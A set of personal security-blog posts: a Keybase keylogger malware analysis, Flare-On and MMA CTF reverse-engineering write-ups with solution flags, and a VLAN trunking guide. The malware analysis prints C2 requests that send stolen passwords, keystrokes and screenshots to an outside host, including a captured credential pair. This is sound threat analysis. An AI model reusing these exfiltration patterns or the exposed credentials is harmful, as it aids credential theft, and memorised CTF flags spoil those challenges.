Keybase Logger/Clipboard/CredsStealer campaign

While checking my email another day i came across a phish email that seemed quite suspicious. see below:

It came with compressed file named Product_details.gz. when extracted; it presented a file named Payment_45476.scr. This file is windows executable which was .net compiled, The file was then opened with a tool called ILSPY in order to analyze its inner workings.
- Looking at its main function it seems it created two threads:

 The function below looks to be using a primitive form of obfuscation that consist on reversing  strings.

Looking at the function below; the malware uses an Encryption class that handles the decryption of several strings found throughout the code see below.

Looking at the function below, it seems it invokes the DecryptText function declared on the Encryption class.

The decoded data corresponds the imports the malware will be using:

• CreateProcessA  
• GetThreadContext 
• SetThreadContext 
• Wow64SetThreadContext 
• ReadProcessMemory 
• WriteProcessMemory 
• NtUnmapViewOfSection 
• VirtualAllocEx 
• ResumeThread

When this sample was executed it was clear the sample had malicious intents.It established persistence by copying itself to the startup folder and setting the autorun registry key at startup. The malware names itself "Important.exe"  which on looking at the code it seems a static value set by the author. see below for registry and file activity.

 [CreateFile] Payment_45476.exe:1316 > %AllUsersProfile%\Important.exe     [MD5: 7c6a2697df26582b438c21ee7ce5b0b1]  
 [RegSetValue] Payment_45476.exe:1316 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\50057d8e6fa9271dc2110b90bda7f871 = C:\ProgramData\Important.exe  

The malware then starts to reach out to its c2. The requests indicate the malware has the following capabilities:

• Takes a screenshot of the current working window
• Acts as a keylogger and credential stealer.
• Captures clipboard content. 

 GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM  
 HTTP/1.1  
 "steals passwords from chrome password cache"  
 GET /wp-includes/css/keybase/post.php?type=passwords&machinename=PETERPC&application=Chrome&link=http://gsl8411.ru.swtest.ru/ru-ru/user&username=polloloco&password=zi25XgKY  
 HTTP/1.1  
 "it has keylogging capabilities"  
 GET /wp-includes/css/keybase/post.php?type=keystrokes&machinename=PETERPC&windowtitle=Filter&keystrokestyped=teststringt&machinetime=12:00%20AM  
 HTTP/1.1  
 POST /wp-includes/css/keybase/image/upload.php HTTP/1.1  
 Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930  
 Host: examgist.com  

On looking further to the c2 callbacks, it was noticed the locations in which the screenshots were shared was world readable. See sample below:

The login panel was also available :

In conclusion ,this malware is considered primitive based on its design. however, it can certainly cause damage  its kelogging, screen sharing  and credential stealing capabilities make it very attractive to skiddies. thank you for reading


MD5:
7c6a2697df26582b438c21ee7ce5b0b1  Payment_45476.scr
398af2fd86ce37d6d3052eb7503b2790  Order_25464.scr
78c4256eb2003db620a45adba44f404c  Order_34002.gz
9dada7b67f5066e6f5d394222240beb9  Product_details.gz

C2:
http://examgist[.]com/wp-includes/css/keybase/login.php


VT:
https://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/

Flare Challenge 1

First time playing the flare challenge and wanted to know how fun it was.  so i got the first challenge. and it came on a file named Flare-On_start_2015.exe. on executing this file it dumps an additional file named i_am_happy_you_are_to_playing_the_flareon_challenge.exe.  so lets begin:

- first i wanted to know what type of file it was so i ran the file command against it:

 ubuntu@nu11byt3s:/mnt/malware-repo/flare$ file i_am_happy_you_are_to_playing_the_flareon_challenge.exe  
 i_am_happy_you_are_to_playing_the_flareon_challenge.exe: PE32 executable (console) Intel 80386, for MS Windows  

- Good, it seems its a windows binary. so i went ahead an ran it to see what it was like:

- it seems this binary performs some authentication possibly related to the key. so lets open the binary on idapro and see how it looks like in there:

- The section above illustrates the part of the program in which processes the input. the input is then saved on byte_402158 after the call to ReadFile is executed. the next instruction is then a xor instruction which zero out ecx. and after the xor there is a section which seems like an encoding routine lets take a closer look: 

On looking at the Loc_40104D region it seems the program moves a byte  from byte_402158  region to lower byte of eax. then it performs a XOR with value 7D, the xored AL value then gets compared with a byte located on the following region byte_402140 if the comparison is successful it increases ecx by one,  it checks if exc  is 24 and if not it goes back to the beginning of the loop. once the loop reaches 24 it then reaches the section where it prints "you are success".

After this analysis i opened up the binary in inmunity debugger and placed a breakpoint on the xor operation it was described above.  once the input was entered which i used "AAAA" i went ahead and located the location in which our key was located by right clicking->follow dump->address constant  on the following section [ECX+402140] 

 00401055 |. 3A81 40214000 |CMP AL,BYTE PTR DS:[ECX+402140]  

it would automatically show the location where the  encoded key resides as well the data from your input. see below: 

as we can see our encoded key covers 24 bytes starting from address 00402140. i then created an immunity plugin to acquire the key. see the script in action below: 

i called my plugin myplugin and it takes 2 parameters first paramenter is the start address of the key, the next parameter is the end address for the key.  see source code below:

 #!/usr/bin/python  
 import immlib  
 import getopt  
 import immutils  
 from immutils import *   
 imm = immlib.Debugger()  
 def usage():  
      imm.log("Usage: [startingaddr] [endingaddr]")  
 def main(args):  
      key = list()  
      if not args:  
           usage()  
      else:  
           if (len(args) > 1):  
                startingAddr = int(args[0],16)  
                bytes = int(args[1],16) - int(args[0],16)  
                for i in range(bytes):  
                     memchar = imm.readMemory(startingAddr + i,1)  
                     memchar = chr(int(hex(ord(memchar) ^ 0x7d),16))  
                     key.append(memchar)  
                imm.log("key is %s" % ("".join(key)))  
                return "key was found ^_^"  

Thank you for reading and see you next time. 

How to Configure Vlan trunking between Cisco switch and ESX host

This blog post explains step by step instructions on how to setup vlan trunking between a cisco switch and an esx host. so lets begin:

Device list: 

Cisco catalyst 3560 switch 

Vmware esxi 5.5.0

-Simple network Diagram below:

- First we need perform the configurations on the cisco switch. below are the commands used:

interface FastEthernet0/7

 description link to trunk to esx vswitch 

 switchport trunk encapsulation dot1q

 switchport trunk allowed vlan 10

 switchport mode trunk

 switchport nonegotiate

 no cdp enable

 spanning-tree portfast trunk

- Second is the setup of the ESX part. first we need to create a vswitch. to create a vswitch we go to the following tab under the ESX management console and click on Add networking and choose Virtual machine. 

- Then the next menu will allow you to create a vswitch. Create a new vswitch and choose NIC that will be used by this switch. in this example will be vmnic1. then click next.

- On the section above a Vswitch name Malware-lab was created. on the second option VLAN ID, the vlan number to be setup needs to declared there. in this case is vlan 10.  Once this settings are saved  just perform a ping between the endpoints and it should be able to communicate.

MMA CTF "howtouse" "cannotberun" challenge writeup

howtouse challenge:

- On looking at the file it seems its a windows dll file. After looking at its export section, it contains an interesting export that might give us a lead "fnhowtouse(int)".
- Using ollydbg i loaded the dll and ran the export with the parameter of 1. once it took me to the beginning of its execution i noticed a series of MOV operations referencing the area of memory below which seemed a bit suspicious.

CPU Dump
Address   Hex dump                                         ASCII
71061000  B8 01 00 00|00 C2 0C 00|CC CC CC CC|CC CC CC CC| ¸   Â ÌÌÌÌÌÌÌÌ
71061010  B8 61 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸a   ÃÌÌÌÌÌÌÌÌÌÌ
71061020  B8 62 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸b   ÃÌÌÌÌÌÌÌÌÌÌ
71061030  B8 63 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸c   ÃÌÌÌÌÌÌÌÌÌÌ
71061040  B8 64 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸d   ÃÌÌÌÌÌÌÌÌÌÌ
71061050  B8 65 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸e   ÃÌÌÌÌÌÌÌÌÌÌ
71061060  B8 66 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸f   ÃÌÌÌÌÌÌÌÌÌÌ
71061070  B8 41 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸A   ÃÌÌÌÌÌÌÌÌÌÌ
71061080  B8 4D 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸M   ÃÌÌÌÌÌÌÌÌÌÌ
71061090  B8 30 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸0   ÃÌÌÌÌÌÌÌÌÌÌ
710610A0  B8 31 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸1   ÃÌÌÌÌÌÌÌÌÌÌ
710610B0  B8 32 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸2   ÃÌÌÌÌÌÌÌÌÌÌ
710610C0  B8 33 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸3   ÃÌÌÌÌÌÌÌÌÌÌ
710610D0  B8 34 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸4   ÃÌÌÌÌÌÌÌÌÌÌ
710610E0  B8 37 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸7   ÃÌÌÌÌÌÌÌÌÌÌ
710610F0  B8 38 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸8   ÃÌÌÌÌÌÌÌÌÌÌ
71061100  B8 39 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸9   ÃÌÌÌÌÌÌÌÌÌÌ
71061110  B8 7B 00 00|00 C3 CC CC|CC CC CC CC|CC CC CC CC| ¸{   ÃÌÌÌÌÌÌÌÌÌÌ
71061120  B8 7D 00 00|00 C3 CC CC|CC CC CC CC|CC CC        ¸}   ÃÌÌÌÌÌÌÌÌ

- On looking at the memory region above, there seems to be a pattern in which the first byte is B8 and the next byte is an ascii char. since i noticed there were chars that could be part of the key i figured  it could be used to build the key later on.

- On following the execution of the program, the memory region above was indeed used to build the key what i did was to put a break point on the following instruction and wait for the program to hit it:

CPU Disasm
Address   Hex dump          Command                                  Comments
71061276  |.  C78424 B40000 MOV DWORD PTR SS:[LOCAL.0],71061120      ; Entry point


Once it hit the breakpoint i went to analyze the memory on LOCAL.0. to my surprise it indicated the last part of the key.

CPU Dump
Address   Hex dump                                         ASCII
0012FE90  80 10 06 71|80 10 06 71|70 10 06 71|10 11 06 71| € q€ qp q q
0012FEA0  60 10 06 71|30 10 06 71|E0 10 06 71|40 10 06 71| ` q0 qà q@ q
0012FEB0  00 11 06 71|90 10 06 71|30 10 06 71|10 10 06 71|   q q0 q q
0012FEC0  90 10 06 71|90 10 06 71|A0 10 06 71|60 10 06 71|  q q q` q
0012FED0  30 10 06 71|F0 10 06 71|E0 10 06 71|A0 10 06 71| 0 qð qà q q
0012FEE0  B0 10 06 71|D0 10 06 71|00 11 06 71|E0 10 06 71| ° qÐ q qà q
0012FEF0  40 10 06 71|F0 10 06 71|F0 10 06 71|40 10 06 71| @ qð qð q@ q
0012FF00  00 11 06 71|50 10 06 71|50 10 06 71|E0 10 06 71|   qP qP qà q
0012FF10  50 10 06 71|60 10 06 71|10 10 06 71|00 11 06 71| P q` q q q
0012FF20  50 10 06 71|00 11 06 71|20 10 06 71|C0 10 06 71| P q q qÀ q
0012FF30  B0 10 06 71|50 10 06 71|40 10 06 71|F0 10 06 71| ° qP q@ qð q
0012FF40  20 11 06 71|                                       q

All there is left at this point is to start decoding each byte one by one until the key is revealed.
key: MMA{fc7d90ca001fc8712497d88d9ee7efa9e9b32ed8}



"cannotberun" challenge : this challenge was about fixing a corrupted PE header. once the header was fixed just run the program and it would give you the key.

key: MMA{7a35hxb9q81fsg6}